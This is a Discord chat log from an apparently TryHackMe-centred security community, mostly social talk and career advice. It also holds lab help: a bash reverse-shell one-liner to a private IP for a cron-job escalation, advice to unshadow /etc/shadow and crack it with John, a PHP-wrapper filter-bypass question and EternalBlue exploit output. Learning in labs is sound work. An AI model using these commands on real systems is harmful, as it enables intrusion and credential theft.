π½
crude stump
Damn
kindred bear
sniff pepper to induce a sneeze?
past sparrow
watch clips of someone yawning to induce yawn
heady nova
<@949410649522450473> https://youtube.com/shorts/Qd7naGvHbbE?si=QnsQ94_xG1noqHxW
That's what you call a great start of a birthday
But you revealed our secret, @boreal scarab .... Sending Mauses to your haus
sand trench
meep meep this a comfy bed for sleep sloops to the beep boops while the moop moops
molten sky
But you revealed our secret, <@214547132231843840> .... Sending Mauses to your h...
english only!
bad!
heady nova
meep meep this a comfy bed for sleep sloops to the beep boops while the moop moo...
Oh hey shadow, how's the day been?
sand trench
Oh hey shadow, how's the day been?
ZzzzZZzzZzzzz
heady nova
english only!
Shush lemme flex my deutsch
sand trench
Oh hey shadow, how's the day been?
to answer honestly just before shuting down computer... friday was good.. watched a lot of development for neovim plugins and update shadows config using the modular kickstart.nvim
also looked into some fun android stuffs
heady nova
to answer honestly just before shuting down computer... friday was good.. watche...
That's nice, I abandoned neovim since setting it up was taking more time and I was supposed to be productive with it and not tangled in lua web
heady nova
also looked into some fun android stuffs
Why not ios
sand trench
Why not ios
can not affords and not as good for open source apps
heady nova
can not affords and not as good for open source apps
True, been thinking of getting into android malware rev but I don't know what to do at this point
heady nova
Pentesting, SoC, cloud security, Security Researcher
sand trench
True, been thinking of getting into android malware rev but I don't know what to...
get to 0xD on tryhackme and ask for guidance in the advanced channels
heady nova
you reverse!
I can moon walk, does that help?
molten sky
get to 0xD on tryhackme and ask for guidance in the advanced channels
i want 0xD just to shitpost in advanced but i also don't wanna get 0xD cause lazy
simple valve
i want 0xD just to shitpost in advanced but i also don't wanna get 0xD cause laz...
Do it, get 0xD already
its ez pz for u
heady nova
get to 0xD on tryhackme and ask for guidance in the advanced channels
Hmmm aight I still got 2 months before internship. The only sad thing is college won't leave me alone and I'm still ahead of em so it feels like a waste of time to go there but I have to
heady nova
Do it, get 0xD already
Hey there Mknukn
heady nova
What does your name mean tho
sand trench
anyways time for that sweet sweet release of sleep meep beep sloop moop boop times
heady nova
How have u been
I have been good, kinda anxious but good. Also been grinding student sub of htb academy recently
simple valve
Its an acronym for word play in the common language in my country. its direct translation is βiβve loved you ever since the first day i met youβ
heady nova
anyways time for that sweet sweet release of sleep meep beep sloop moop boop tim...
G'night~
simple valve
I have been good, kinda anxious but good. Also been grinding student sub of htb ...
nice htb academy is good. What modules are you doing?
heady nova
nice htb academy is good. What modules are you doing?
I'm completing the Penetration Tester path
But gotta finish the intro to Asmx86-64 and intro to malware analysis first
Also shellcode and payloads
I'm going reverse Tier 2 -> Tier 1 -> Tier 0
How you been @simple valve ?
simple valve
I'm completing the Penetration Tester path
Thats great, i hope youre not getting bored by their walls of texts but their content is super good and i wish i had more time to tackle it on
heady nova
Thats great, i hope youre not getting bored by their walls of texts but their co...
Actually, I'm pretty good at reading stuff
But you should try Tier 4
It's heaven
simple valve
I wish I had that, I hate reading long walls of text
The payments are super wild π, i cant afford it right now
heady nova
I wish I had that, I hate reading long walls of text
Start small by reading blogs and small books
heady nova
The payments are super wild π, i cant afford it right now
True, but you got student Id?
simple valve
But Im doing CRTO rn and just passed my ASCP exam
simple valve
True, but you got student Id?
Nope i do not, i am unfortunately a working individual now
heady nova
You can accumulate 1600 cubes by doing till Tier 2
simple valve
Darn tax eating my paycheck
heady nova
Nope i do not, i am unfortunately a working individual now
Dang it
heady nova
Darn tax eating my paycheck
Afraid of that too
heady nova
But Im doing CRTO rn and just passed my ASCP exam
Damnnnn congrats man
lone thistle
eeeek
simple valve
Damnnnn congrats man
Thank youu
twin ridgeBOT
Gave +1 Rep to @heady nova (current: #209 - 25)
simple valve
Hope to see you with a certification soon, CPTS perhaps π
crude stump
Oh my
lone thistle
if you close your eyes, its like its not even there
ahaha. trueee. Trying to make a bit of a dent in this. RustScan needs a bit of TLC
crude stump
It looks interesting especially because itβs by Cisco
heady nova
Hope to see you with a certification soon, CPTS perhaps π
That's what I'm prepping for
Just happy that finally I'll have something solid on my resume
simple valve
Good luck! The badge looks nice on the HTB Discord since its beside your name
heady nova
Good luck! The badge looks nice on the HTB Discord since its beside your name
Hahaha I'm on their discord but never chat
simple valve
ahaha. trueee. Trying to make a bit of a dent in this. RustScan needs a bit of T...
do you maintain this project among other things?
I mean alongside other developers
heady nova
It looks interesting especially because itβs by Cisco
That reminds me, I'll take CCNA soon
lone thistle
do you maintain this project among other things?
i'm on the core dev team yeah but uh .... I haven't contributed/maintained for quiiite a while π
twin ridgeBOT
Gave +1 Rep to @crude stump (current: #239 - 21)
simple valve
i'm on the core dev team yeah but uh .... I haven't contributed/maintained for q...
Iβd understand that. I canβt imagine myself maintaining a tool always on top of my other responsibilities, must be hard work
Salute to all OSS devs π«‘
boreal scarab
But you revealed our secret, <@214547132231843840> .... Sending Mauses to your h...
Also happy BDay!
heady nova
Also happy BDay!
Thanks man π
molten sky
idk what this one is from but one of my favourite things in battlefield used to be sniping jets and helicopters out of the air with tanks on the other side of the map
past sparrow
Thanks man π
Happy birthday
heady nova
Happy birthday
Thanks dude
twin ridgeBOT
Gave +1 Rep to @past sparrow (current: #322 - 14)
upbeat axle
heady nova
idk what this one is from but one of my favourite things in battlefield used to ...
You could do that?!
crude stump
idk what this one is from but one of my favourite things in battlefield used to ...
I may be wrong but I think itβs from warthunder
molten sky
You could do that?!
yeah just gotta aim
simple valve
#room-help I think is a better place to ask your question
Youβll get much more streamlined help
crude stump
I may be wrong but I think itβs from warthunder
Either this or world of tanks but nobody plays that game lol
molten sky
I may be wrong but I think itβs from warthunder
i had a feeling that might be it but i wasn't sure enough to really say
wot was the alternative
haven't played that in years
crude stump
Ikr
molten sky
it used to be good actually
narrow dove
has anyone tried the new room (hack-smarter-security)?
simple valve
has anyone tried the new room (hack-smarter-security)?
#1218273577720348802 channel
if you want to find others that are currently doing/have done it.
boreal scarab
idk what this one is from but one of my favourite things in battlefield used to ...
That one would be WoT
rapid merlin
Doing a ctf
Directory traversal found
Can't figure out which file to retrieve from the server
How can I enlist dirs content
I have etc passed
Never got to exploit it
Any ideas?
fresh cobalt
I have etc passed
Never got to exploit it
Do you have etc/shadow and etc/passwd ?
rapid merlin
Do you have etc/shadow and etc/passwd ?
I hav passwd
fresh cobalt
If you have etc/shadow , unshadow it with etc/passwd and use John
simple valve
Doing a ctf
Directory traversal found
Can't figure out which file to retrieve fr...
Is this a CTF from TryHackMe?
simple valve
Oh okie, I think youβll better have help asking in their respective forums and whatnot.
rapid merlin
How to bypass :// for php wrappers
I tried encoding
Url url hex
Any other way around?
coarse moth
#!/bin/bash
bash -i >& /dev/tcp/10.10.32.110/8080 0>&1
is this command good for a reverse shell?
sinful thunder
#!/bin/bash
bash -i >& /dev/tcp/10.10.32.110/8080 0>&1
is this command good fo...
Potentially ?
coarse moth
Potentially ?
? what you mean
sinful thunder
Itβs a possible reverse shell to 8080/TCP on said IP but it will depend on your environment
For most scenarios; yes itβll work. It will most definitely be caught by something like SecurityOnion
coarse moth
Itβs a possible reverse shell to 8080/TCP on said IP but it will depend on your ...
I'm exploiting a cron job to get a reverse shell root of the target system, however I'm listening with ncat and haven't received anything
sinful thunder
In terms of a help desk; Make sure you have a VPN connection to THM infrastructure.
In terms of Offsec; Make sure youβre exploiting it properly. (IE: cron jobs are running, no firewall rules blocking that outgoing port, etc)
coarse moth
In terms of a help desk; Make sure you have a VPN connection to THM infrastruct...
There was a small error in a misplaced character, thank you anyway
twin ridgeBOT
Gave +1 Rep to @sinful thunder (current: #2025 - 1)
hardy forum
Hey guys
Thank you for having me here
Please I have a question. Am new to IT/ cybersecurity am a newbie. I want to start my career in cybersecurity. The Tryhackme is it a good place to start?
Thank you
fresh cobalt
Please I have a question. Am new to IT/ cybersecurity am a newbie. I want to sta...
Go for it , itβs great. Plenty of labs with hands on, youβll learn a lot
hardy forum
Go for it , itβs great. Plenty of labs with hands on, youβll learn a lot
Wow. Thank you π
twin ridgeBOT
Gave +1 Rep to @fresh cobalt (current: #2025 - 1)
blazing granite
Please I have a question. Am new to IT/ cybersecurity am a newbie. I want to sta...
hardy forum
<#806554132117979143>
Thank you π
twin ridgeBOT
Gave +1 Rep to @blazing granite (current: #139 - 48)
simple valve
Hi @graceful thistle !!
I have not seen you around in quite a while
How goes it in NZ (?)
blazing granite
@buoyant tree Sup!!!
buoyant tree
<@1167506060307865610> Sup!!!
hullo
listening to a cover which I am not even sure falls into a proper genre
blazing granite
I'm drinking πΊ
gray sonnet
Hi Drinking, I'm Vain π
blazing granite
Hi Drinking, I'm Vain π
that was indeed, quite a vain answer π
gray sonnet
which is better attachbox or open vpn
Personally I prefer using my own machine
blazing granite
which is better attachbox or open vpn
really depends on your preferences
buoyant tree
I like attackbox more since I don't have to spin up a VM every timei
gray sonnet
Hey, anyone here plays phasmophobia?
blazing granite
I don't play with phobias π
blissful axle
Hi guys, I am looking for a vulnerability in Version 5 of rar for open a file with a password, can anyone help me in that?
simple valve
Hi guys, I am looking for a vulnerability in Version 5 of rar for open a file wi...
What are you trying to do?
blissful axle
Find a vulnerability in that version then exploit it then open the file ππ
blissful axle
What are you trying to do?
.
blazing granite
Find a vulnerability in that version then exploit it then open the file ππ
Sounds unethical, I believe nobody will help you here, it's against the rules
blissful axle
Sounds unethical, I believe nobody will help you here, it's against the rules
But the vulnerability deja known by rarlab and they create a new version for it, it is just for learning
blazing granite
But the vulnerability deja known by rarlab and they create a new version for it,...
please don't press the matter any further, we're happy to help you with anything tryhackme related
weak plaza
Guys i was doing eternalblue room on thm. i was able to exploit but cannot create a session. i am getting this error. Any help??
[] 10.10.150.14:445 - Sending egg to corrupted connection.
[] 10.10.150.14:445 - Triggering free of corrupted buffer.
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
chilly veldt
Guys i was doing eternalblue room on thm. i was able to exploit but cannot creat...
Try and reset the room
boreal gull
@grizzled crystal may i DM? Someone i know is starting an A11Y cyber security podcast and i am helping them find other people to talk on it
brisk tree
Morning
weak plaza
Try and reset the room
Tried it out.. not workingπ₯²
past sparrow
Guys i was doing eternalblue room on thm. i was able to exploit but cannot creat...
try again, windows and eternalblue can fail from time to time
if still not working after reasonable attempts - might not be the correct exploit
weak plaza
try again, windows and eternalblue can fail from time to time
Sure I'll I give a try
weak plaza
if still not working after reasonable attempts - might not be the correct exploi...
I used the exact same thing given my the room.. options are set properly.. idk the issues coming from
sick lance
Stick to #room-help for this please.
past sparrow
good morning
Looked at Locked Shields lineup for our team, I am so happy I get to be in Windows team ...
erveryone else I know "Uncertain" π₯²
I don't mind it though, glad they knew what I wanted to do in advance
get to see my old colleague as well so thats a win
Not so sure its a lonely path
sick lance
Depends on the questions your asking, I suppose.
past sparrow
line is determined by if you ask for sake of asking or you geniuenly want to know
Though often time the answer can be "you can look it up in 2 minutes from google"
finite edge
I have a question
sick lance
Depends on the question, we may, or may not have an answer.
finite edge
Do I need working knowledge of any programming languages before starting my career in cybersecurity?
past sparrow
No
finite edge
So I can start without any knowledge of programming languages?
past sparrow
Yes
finite edge
Companies accept such candidates who has no knowledge in programming languages if they were to apply for any position related to cybersecurity?
past sparrow
I think you should elaborate your questions tad bit more, or narrow them down, because I am answering for the whole scope of cybersecurity now. Including compliance.
So, yes, to your latest question
finite edge
All right, let's say I want to become a penetration tester for a company. Will I require any working knowledge of programming languages?
past sparrow
All right, let's say I want to become a penetration tester for a company. Will I...
It's doable, but you will be tool dependent and you won't be able to modify it to your liking and to company specific environment, so if there is a constant argument that is purposefully different in the company you are penetration testing - your tool is useless
finite edge
It's doable, but you will be tool dependent and you won't be able to modify it t...
List a few programming languages that will be useful if I'm to become a penetration tester.
past sparrow
List a few programming languages that will be useful if I'm to become a penetrat...
Javascript, Python, Java, PHP
not exactly programming languages but also SQL and powershell
Most penetration testing jobs on the market are for web apps and phone apps, its not often someone wants full domain penetration test
finite edge
Most penetration testing jobs on the market are for web apps and phone apps, its...
Thank you for answering my questions.
twin ridgeBOT
Gave +1 Rep to @past sparrow (current: #307 - 15)
past sparrow
No problem and good luck
Quite possibly
Either that or something similar likely will be there
shell nova
Very possibly I'm afraid
exotic lark
guys, how can i verify my thm account here?
sharp citrusBOT
@exotic lark
exotic lark
ty
graceful thistle
I have not seen you around in quite a while
Heya, how are you? π all is well here, just going home now from a really long dinner party haha
ashen wadi
Every SOC center is different,for example in mine we use ELK only for network,and for other things we have some inhouse made SIEM. Usually people go with ELK,Splunk,Qradar, Azure Sentinel..
rapid merlin
Anyone has a gaming laptop?
finite edge
Anyone has a gaming laptop?
naive violet
Most penetration testing jobs on the market are for web apps and phone apps, its...
Plenty of that work about
rapid merlin
https://tenor.com/view/wtff-cat-confused-orange-gif-25858653
Do you?
past sparrow
Plenty of that work about
Might also depend on region, I am more familiar with European market than U.S or Asian market
rapid merlin
Might also depend on region, I am more familiar with European market than U.S or...
Me too, but I have different experience with that
I work for an MSP, and it is pretty common to do penetration tests
past sparrow
I work for an MSP, and it is pretty common to do penetration tests
Oh, I am not saying that Domain penetration tests are uncommon, I am saying that the demand for web pentest is a lot higher
rapid merlin
Oh, I am not saying that Domain penetration tests are uncommon, I am saying that...
ah in that way
naive violet
Might also depend on region, I am more familiar with European market than U.S or...
I'm not in the US
past sparrow
I may be wrong though and our company just gets more web stuff than any other things
simple valve
I'm from Asia market and am in house tester for our web apps and APIs
past sparrow
web and phone apps
ashen wadi
I'm from Asia market and am in house tester for our web apps and APIs
How hard is to test house? 
past sparrow
how do your phone app tests go?
Oh I am not a pentester but from what I have heard from the red team's bi-annual reports they are quite successful in that (whatever that means)
Are developers not good or our pentesters very good, that I don't know
mint palm
I found that testing mobile apps (especially made by big companies) are pretty boring, where internal infrastructure tests reveal more critical vulns
Probably because itβs easier to harden one mobile app (especially that most use APIβs) than to secure 20k or more hosts running multiple services
rapid merlin
My gaming laptop lasts less than 2 hours is there anything I can do it was 48whr battery
simple valve
My gaming laptop lasts less than 2 hours is there anything I can do it was 48whr...
Keep it plugged in
That's how gaming laptops work
ashen wadi
Why would you even get gaming laptop,build SFF PC and have one cheap thinkpad for playing with linux 
BUT dont build to small one,because your cat will need warmth β€οΈ
past sparrow
only thing you need is a laptop with 1 USB-C port everything else is reduntant
loud marlin
ashen wadi
Stop overcomplicating stuff dudee,just learn basics and when you get job in soc ,they will show you everything.
past sparrow
You read out only 4 from that list? ποΈ π ποΈ
ELK is acronym for 3 tools
But yeah, learn 1, knowledge will somewhat carry over
past sparrow
Stop overcomplicating stuff dudee,just learn basics and when you get job in soc ...
exactly, everything can be learned on the job
past sparrow
why stop at there, make it HELK!
past sparrow
now this can be fun
rapid merlin
Keep it plugged in
Till now it was mostly plugged all time
But today I used without charger i used youtube and browsing it only lasted like 2 hr
ashen wadi
now this can be fun
What SocAnalyst tier are you?
rapid merlin
My gaming laptop only lasts 2hrs
past sparrow
What SocAnalyst tier are you?
2/3
mint palm
You read out only 4 from that list? ποΈ π ποΈ
Thereβs also βBeatsβ
But not in the acronym π
ashen wadi
So you are threat hunter and also digital forensic?
past sparrow
Thereβs also βBeatsβ
yeah, I just expanded that there is more than 1
past sparrow
So you are threat hunter and also digital forensic?
and IR
ashen wadi
Do you also have to write scripts for detection or do you have sepearate team of detection engineers for that?
past sparrow
but yeah, digital forensic is part of IR
past sparrow
Do you also have to write scripts for detection or do you have sepearate team of...
I prefer writing my own scripts for most things, we don't have separate team for that no
if I can't find it via script I find a work around
ashen wadi
My friend from chicago is tier 3 analyst with 6 years of expereince,has over 100k salary and cant write scripts lol
He says there is whole department of guys who do just that π
past sparrow
yeah no, I like the idea of composing what I look for myself
if you have team doing the script writing for you, may as well replace you with combined script tool
ashen wadi
Do you have any tips how to start with writing scripts? My knowledge is very shallow,i can write only basic bash stuff..really basic lol
My plan is to learn JS/PHP but at the same time i would like to script in python and idk how to combine all that learning π
past sparrow
depends on what you really want to use the script for
start writing atom queries / tasks
and combine them over time
make sure atom works first, before combining
script doesn't need to look fancy, it just has to get the job done, online documentation is always there to help
If you need to deal with windows devices, then for starters can start learning PowerShell
ashen wadi
π«‘
past sparrow
Just like all things, it needs practice and uh
things that never start take longest to finish
past sparrow
and was doing death note for friend
looks quite good
loud marlin
death note is nice for sure
ashen wadi
You painted this?
loud marlin
You painted this?
nah. laser engraving
timid prism
cant help that im overthinker
versed prairie
It's probably a stupid question, but if i'm doing a reverse shell in a room over VPN how do i get my IP?
simple valve
It's probably a stupid question, but if i'm doing a reverse shell in a room over...
ip a then find the relevant tun IP
You can also visit the tryhackme website and go to /access to see your IP.
versed prairie
`ip a` then find the relevant `tun` IP
I don't have a tun IP. I think i don't have it cause im going through a OpenWRT Setup that is connected to the VPN? Could this be the problem why i dont get my connection?
onyx heath
ifconfig should do
earnest bolt
its my first time learning abt thsi stuff what learning path should i taek
earnest bolt
ty
plush mesa
why dont they just add that path recommendation list to the site, for example as recommendation right after signing up
shell nova
and was doing death note for friend
Renders well on slate
loud marlin
Renders well on slate
app havce nice filter. Dieter. it turn color and shades of color into 255 shades of grey and auto power and speed of laser to achive effect
shell nova
app havce nice filter. Dieter. it turn color and shades of color into 255 shades...
Assumed as much
At least for the greyscale and laser power
loud marlin
as this
loud marlin
for that its caled bas relief picture
https://www.laser-pics.com/ page with prepared for laser
loud marlin
are all the paths fully free??
around 80% thm is free
earnest bolt
which ones arent
loud marlin
some are one that you get if you subs to thm. not sure what ones are paid. you can use search tab to list them as wish
earnest bolt
for the most part i can get through the basics for free?
plush mesa
No entire paths are paid (other than the AWS one) there's always free and subscription based rooms in each path
loud marlin
for the most part i can get through the basics for free?
ill say yes
shell nova
for the most part i can get through the basics for free?
Yup
earnest bolt
ight ty
sick lance
are all the paths fully free??
No, tha paths have subscription room.
loud marlin
@shell nova also this. aside i used less power for effect. but yea. that is that auto filter
shell nova
Some colours translate better
loud marlin
yep. more range of colors are better. and depend of material
for b/w pictures, simple one engraving goes fast. for this slates it need 20ish min for 2k pic with around 2k mm/s. if i convert to 8k it need 45 min cca. and all also depend of LPI (same as DPI, just this is lines per inch)
shell nova
Aye
loud marlin
and it helps since is galvo laser. but down thing is is only 2w IR laser. if i get fiber galvo of 60/80/100 w i can do 3d relief on metal coins and so. which will be rly nice π
white nexus
Has anyone here looked at the AWS Cloud plan on TryHackMe? Is it worth it?
sick lance
Has anyone here looked at the AWS Cloud plan on TryHackMe? Is it worth it?
A few people have enjoyed it.
cedar scaffold
id assume it also depends on if you're interested in cloud security, if so then probably yes 
sick lance
Worth it?
Depends on your PoV, difference of opinions and all.
white nexus
Worth it?
Depends on your PoV, difference of opinions and all.
Would be interesting to hear from someone who has taken it
cedar scaffold
i haven't looked at it, but going off the rest of the site, if its a topic you're interested in its probably worth
sick lance
Would be interesting to hear from someone who has taken it
@lean panther has taken it, but they're NZ timezone so not sure when they can reply.
loud marlin
@shell nova and wish to cut metal sheet to cut 0.2 mm metal i need around 200 passes
https://youtube.com/shorts/IVg62xinn2c this is time laps of it π¦
shell nova
<@186470389604548608> and wish to cut metal sheet to cut 0.2 mm metal i need aro...
It's not meant for cutting
sick lance
Tell that to all Bond villains